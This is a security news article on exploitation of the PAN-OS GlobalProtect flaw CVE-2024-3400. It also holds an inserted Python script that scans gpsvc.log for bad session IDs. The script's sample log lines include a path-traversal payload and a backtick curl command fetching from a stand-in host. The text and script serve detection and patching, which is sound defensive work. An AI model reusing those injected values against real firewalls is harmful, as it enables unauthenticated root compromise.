Security researchers are observing a major increase in internet-wide scans targeting the critical PAN-OS GlobalProtect vulnerability (CVE-2024-3400).
Exploit attempts have surged as attackers seek to leverage an arbitrary file creation flaw to gain OS command injection and ultimately full root code execution on vulnerable firewalls.
Exploitation of Critical PAN-OS SSL VPN Flaw (CVE-2024-3400)
Since late September 2025, honeypots deployed globally have logged hundreds of TCP connections probing PAN-OS SSL VPN portals.
SANS Technology Institute observed that one prominent source IP, 141.98.82.26, has repeatedly issued malicious POST requests to the /ssl-vpn/hipreport.esp endpoint, exploiting the lack of session ID validation. The attacker supplies a crafted Cookie header whose session ID value is used, unvalidated, as part of a file path, so the device creates an attacker-named file on disk.
If the file creation succeeds, a follow-up GET request for /global-protect/portal/images/evil.txt returns HTTP 403 rather than 404: the file exists but is not readable by the web server, which confirms its presence.
Attackers then pivot to placing files in directories where the injected file name is consumed by a privileged process, enabling command execution. These automated scans reflect the CVSS 10.0 severity and the network-accessible, unauthenticated attack vector of CVE-2024-3400.
Risk Factors
Affected Products: PAN-OS 10.2 versions before 10.2.9-h1, 11.0 versions before 11.0.4-h1, 11.1 versions before 11.1.2-h3 (with GlobalProtect gateway or portal enabled)
Impact: Arbitrary file creation leading to OS command injection and root code execution
Exploit Prerequisites: None (network-accessible, unauthenticated)
CVSS 3.1 Score: 10.0 (Critical)
Mitigations
Palo Alto Networks has released fixed PAN-OS versions (10.2.9-h1, 11.0.4-h1, 11.1.2-h3) and additional hotfixes for the affected branches.
An immediate upgrade is strongly advised to thwart ongoing exploitation. Administrators can also deploy Threat Prevention signatures 95187, 95189, and 95191 to block the initial arbitrary file creation interaction on the GlobalProtect interface; note that the signatures require a Threat Prevention subscription and a vulnerability protection profile applied to the GlobalProtect interface, and they are a stopgap rather than a substitute for patching.
For detection, operators should grep the GPSvc (gpsvc.log) logs for anomalous session ID strings:
Legitimate session IDs appear as GUID-style hex-digit groups; any file-system path or shell snippet between session( and ) indicates an exploitation attempt.
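The check described above, as an added example (not code from the article or from Palo Alto Networks): it classifies the session ID captured between session( and ) in each gpsvc.log line as a legitimate GUID, a path-traversal payload, or a shell snippet. The log lines are constructed for illustration, and the exact line format on a real device is an assumption; only the session(...) fragment matters to the matcher.

```python
import re

# Constructed sample lines in the style of PAN-OS gpsvc.log "failed to unmarshal
# session" entries (illustrative; the surrounding line format is an assumption).
SAMPLE_GPSVC_LOG = """\
2025-09-29 10:14:02 gpsvc: failed to unmarshal session(0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9)
2025-09-29 10:14:05 gpsvc: failed to unmarshal session(../../../../var/appweb/sslvpndocs/global-protect/portal/images/evil.txt)
2025-09-29 10:14:09 gpsvc: failed to unmarshal session(`curl http://example.invalid/x`)
2025-09-29 10:15:11 gpsvc: failed to unmarshal session(DEADBEEF-0000-1111-2222-333333333333)
"""

# A legitimate session ID: five hex-digit groups in 8-4-4-4-12 layout.
GUID_RE = re.compile(r"^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")
# Capture everything between "session(" and the final ")" on the line.
SESSION_RE = re.compile(r"failed to unmarshal session\((.*)\)")
# Shell metacharacters that never belong in a session ID.
SHELL_META_RE = re.compile(r"[`$;|&]")


def classify_session_id(value):
    """Return 'ok' for a GUID, 'shell' for command-injection-like content,
    'path' for path traversal or slashes, and 'anomalous' for anything else."""
    if GUID_RE.match(value):
        return "ok"
    if SHELL_META_RE.search(value):
        return "shell"
    if "/" in value or ".." in value:
        return "path"
    return "anomalous"


def scan_gpsvc_log(text):
    """Return (line_number, verdict, session_id) for every non-GUID session ID."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SESSION_RE.search(line)
        if not m:
            continue
        sid = m.group(1)
        verdict = classify_session_id(sid)
        if verdict != "ok":
            hits.append((lineno, verdict, sid))
    return hits


if __name__ == "__main__":
    for lineno, verdict, sid in scan_gpsvc_log(SAMPLE_GPSVC_LOG):
        print(f"line {lineno}: {verdict}: {sid}")
```

Run it against the output of the device's log export; any hit is worth treating as an exploitation attempt, and a 'shell' hit after a 'path' hit from the same source is the two-stage pattern the article describes.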
A timeline of updates shows that enhanced factory reset (EFR) procedures and CLI commands for evidence collection were published between April and May 2024, underscoring the ongoing remediation efforts.
Cloud NGFW and Prisma Access customers are not affected; only on-premises PAN-OS 10.2–11.1 devices with GlobalProtect gateway or portal enabled are at risk.
Organizations should verify their configuration via the firewall GUI under Network > GlobalProtect > Gateways/Portals and audit for unauthorized files in /var/appweb/sslvpndocs.
As threat actors continue to weaponize CVE-2024-3400, vigilant patch management, proactive log inspection, and robust Threat Prevention enforcement remain critical to defending against unauthorized root-level access.